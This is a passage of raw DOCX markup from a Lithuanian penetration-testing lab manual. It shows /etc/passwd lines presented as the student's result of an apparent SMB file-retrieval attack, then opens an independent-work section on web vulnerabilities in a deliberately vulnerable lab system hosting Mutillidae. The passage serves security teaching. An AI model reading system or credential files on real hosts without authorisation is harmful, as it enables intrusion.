          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smbmore.ufiyQf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (317.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KiloBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>average</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 317.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KiloBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6F71A6" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3167B829" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>daemon:x:1:1:daemon:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7310C1FA" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin:x:2:2:bin:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64EE7FCA" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>[..]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA95ED9" w14:textId="4D12B0BA" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229582DB" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00607DC0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112A01E" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5126803E" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A10784C" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="62D0E5DD"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14E3E988"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0682CBCB"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="17410F67" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="030F3531"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79784D79" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="1D6001E5" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35F890F3"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1BDD8C67" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="073563B2" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74869509" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A864F9" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDBA62F" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc258656094"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B8F44" w14:textId="47486E2A" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NEPRIVAL</w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>MA</w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> DALIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362712C9" w14:textId="3E26E138" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="00876D9A" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Savarankiškam darbui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4997BC" w14:textId="77777777" w:rsidR="00876D9A" w:rsidRPr="00607DC0" w:rsidRDefault="00876D9A" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1986BC" w14:textId="0B83316B" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB paslaugų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3152A214" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A20B38E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639523B4" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema yra tyčia pažeidžiama per interneto prieigos programas. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> serveris pasileidžia automatiškai, pakraunant pačia OS. Norėdami prieiti prie interneto programų, reikia atidaryti interneto naršyklę ir įveskite URL http:// &lt;IP&gt; kur &lt;IP&gt; yra IP adresas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87976A" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC8B458" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Šiame pavyzdyje pažeistos sistemos IP adresas XXX.XXX.XXX.XXX. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB711A" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEEEA2E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9ACABD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00053DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEE51E6" wp14:editId="53F00B9D">
            <wp:extent cx="5549705" cy="3120027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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70634" cy="3131793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60A14F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291915B6" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262C1EE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B6A6FE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Norėdami pasiekti tam tikrą </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žiniatinklio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> programą, paspauskite vieną iš numatytų nuorodų. Individualūs interneto programas papildomai gali būti prieinama papildymai įvedant katalogo pavadinimą į http:// &lt;IP&gt; sukurti URL http:// &lt;IP&gt; / &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /. Pavyzdžiui, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paraiška gali būti (šiame pavyzdyje) adresu http://192.168.56.101/mutillidae/. sistema yra įdiegta į / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/  katalogą. (Pastaba: Žiūrėkite su komanda "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">") Į dabartinę versiją yra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įdieti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sekantis papildymai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37314ED1" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A97B05" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NOWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.1.19)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E15983" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
